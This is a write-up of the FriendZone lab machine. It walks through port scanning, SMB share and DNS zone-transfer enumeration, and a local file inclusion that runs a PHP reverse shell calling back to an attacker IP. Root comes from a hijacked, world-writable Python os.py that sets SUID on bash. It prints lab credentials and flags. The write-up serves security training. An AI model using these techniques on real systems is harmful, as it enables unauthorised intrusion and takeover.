FriendZone
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.123 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.92 scan initiated Mon Sep 5 13:43:56 2022 as: nmap -sS -p- --min-rate 5000 -Pn -n -oN allPorts 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.044s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
# Nmap done at Mon Sep 5 13:44:09 2022 -- 1 IP address (1 host up) scanned in 13.60 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p21,22,53,80,139,443,445 10.10.10.123 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.92 scan initiated Mon Sep 5 13:45:45 2022 as: nmap -sCV -p21,22,53,80,139,443,445 -oN targeted 10.10.10.123
Nmap scan report for 10.10.10.123
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_http-title: 404 Not Found
|_http-server-header: Apache/2.4.29 (Ubuntu)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -59m59s, deviation: 1h43m54s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-09-05T11:46:00
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2022-09-05T14:46:00+03:00
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Sep 5 13:46:09 2022 -- 1 IP address (1 host up) scanned in 24.41 secondsLet's start enumerating the SMB server with smbmap.
smbmap -H 10.10.10.123
-HIP address of host.
[+] Guest session IP: 10.10.10.123:445 Name: friendzone.red
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))The guest user is able to read the general share and write and read in the Development share. Note the comment on the Files share saying that it is located in /etc/files. We could guess that the other two shares are located in /etc/general and /etc/Development. The Development share is empty.
smbclient //10.10.10.123/Development
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Sep 5 18:16:54 2022
.. D 0 Wed Jan 23 22:51:02 2019
9221460 blocks of size 1024. 6459548 blocks availableBut the general share contains one file called creds.txt.
smbclient //10.10.10.123/general
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 21:10:51 2019
.. D 0 Wed Jan 23 22:51:02 2019
creds.txt N 57 Wed Oct 10 01:52:42 2018
9221460 blocks of size 1024. 6459548 blocks availableLet's transfer it to our local machine, and open it.
smb: > get creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#The file contains some credentials, but we don't know for what yet. If we take a look at the HTTP website on port 80, we'll see just an image and an email with the friendzoneportal.red domain.
Let's add that domain name and the one which nmap reported to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.123 friendzone.red friendzoneportal.redNow, let's check if there is any virtual hosting going on.
If we check the following URL, we'll see another different website.
https://friendzone.red/
And in using the friendzoneportal.red domain name, we'll see another one.
https://friendzoneportal.red/
As port 53 (DNS) is open on the machine, we can try to do a transfer zone attack and list all possible subdomains for the friendzone.red domain name.
dig @10.10.10.123 friendzone.red axfr
; <<>> DiG 9.18.4-2-Debian <<>> @10.10.10.123 friendzone.red axfr
; (1 server found)
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Sep 05 18:32:37 CEST 2022
;; XFR size: 8 records (messages 1, bytes 289)And the friendzoneportal.red domain name.
dig @10.10.10.123 friendzoneportal.red axfr
; <<>> DiG 9.18.4-2-Debian <<>> @10.10.10.123 friendzoneportal.red axfr
; (1 server found)
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 40 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Sep 05 18:34:23 CEST 2022
;; XFR size: 9 records (messages 1, bytes 309)Let's add all these new subdomains to the /etc/hosts file.
nano /etc/hosts
# Host addresses
127.0.0.1 localhost
127.0.1.1 alfa8sa
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
f02::2 ip6-allrouters
10.10.10.123 friendzone.red friendzoneportal.red administrator1.friendzone.red hr.friendzone.red uploads.friendzone.red admin.friendzoneportal.red files.friendzoneportal.red imports.friendzoneportal.red vpn.friendzoneportal.redExploitation
In the administrator1.friendzone.red HTTPS server, there is a login page, where the credentials that we have might work.
https://administrator1.friendzone.red/
It looks like the credentials are valid.
Let's go to the /dashboard.php page.
https://administrator1.friendzone.red/dashboard.php
Let's do what is says and add the GET parameters with those values.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp
If we try to change the pagename parameter, we'll get an error saying that the include function failed.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=test
If we try to put dashboard it will load the page we are currently in.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=dashboard
This happens probably because the PHP script is adding the .php extension to the value of the pagename parameter. One thing we could do is upload a PHP file, which will send us a reverse shell, to the Development share, supposedly located in /etc/Development, and access it through this exploit. I will be using the /usr/share/webshells/php/php-reverse-shell.php reverse shell.
cp /usr/share/webshells/php/php-reverse-shell.php .
nano /usr/share/webshells/php/php-reverse-shell.php
$ip = '10.10.14.11'; // CHANGE THIS
$port = 4444; // CHANGE THISThen upload the shell to the Development share.
smbclient //10.10.10.123/Development
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> put php-reverse-shell.php
putting file php-reverse-shell.php as \php-reverse-shell.php (44.3 kb/s) (average 44.3 kb/s)Set a netcat listener on port 4444.
nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Finally, if we put /etc/Development/php-reverse-shell.php, we should get a shell as the www-data user. Then, we'll be able to grab the user flag.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/php-reverse-shell
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.123] 40512
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
19:55:36 up 53 min, 0 users, load average: 0.01, 0.13, 0.16
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ cat /home/friend/user.txt
a9ed20acecd6c5b6b52f474e15ae9a11Privilege Escalation
First, let's set an interactive TTY shell.
script /dev/null -c /bin/bash
Then I press Ctrl+Z and execute the following command on my local machine:
stty raw -echo; fg
reset
Terminal type? xterm
Next, I export a few variables:
export TERM=xterm
export SHELL=bash
Finally, I run the following command in our local machine:
stty size
51 236And set the proper dimensions in the victim machine:
stty rows 51 columns 236
Let's check the system users.
grep sh /etc/passwd
root:x:0:0:root:/root:/bin/bash
friend:x:1000:1000:friend,,,:/home/friend:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologinThere is only one user called friend. If we inspect the /var/www directory, we'll find the mysql_data.conf file which contains the password for the friend user.
cat /var/www/mysql_data.conf
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZLet's become the friend user.
su friend
Password: Agpyu12!0.213$
friend@FriendZone:/$ whoami
friend
friend@FriendZone:/$ id
uid=1000(friend) gid=1000(friend) groups=1000(friend),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)At this point, I tried to look for scheduled tasks on the system with the pspy tool. Let's transfer pspy to the friendzone machine.
python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...On the time machine, go to the /tmp directory, download the binary, and give it execution permissions.
cd /tmp
wget http://10.10.14.11:8000/pspy64
chmod +x pspy64
If we execute the tool, we'll see at some point that the root user, with the UID set to 0, is executing the /opt/server_admin/reporter.py script.
./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2022/09/05 20:08:01 CMD: UID=0 PID=1787 | /bin/sh -c /opt/server_admin/reporter.py
2022/09/05 20:08:01 CMD: UID=0 PID=1786 | /usr/sbin/CRON -fThis script is just importing the os library and printing a message with a few variables.
cat /opt/server_admin/reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developerThe thing is that if we search for the os.py script, and look its permissions, we'll see that everyone can write on it.
find / -name os.py 2>/dev/null | xargs ls -l
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
-rw-r--r-- 1 root root 37526 Sep 12 2018 /usr/lib/python3.6/os.pyNow we can modify the script so when root executes it, it will give the /bin/bash binary the SUID permission. Add the following code at the end of the /usr/lib/python2.7/os.py script.
nano /usr/lib/python2.7/os.py
system("chmod u+s /bin/bash")If we wait for a few minutes, we should see the bash binary with SUID permissions.
ls -l /bin/bash
-rwsr-xr-x 1 root root 1113504 Apr 4 2018 /bin/bashNow, all we have to do is execute bash with root permissions, reap the harvest and take the root flag.
bash -p
bash-4.4# whoami
root
bash-4.4# cat /root/root.txt
b0e6c60b82cf96e9855ac1656a9e90c7Last updated
Was this helpful?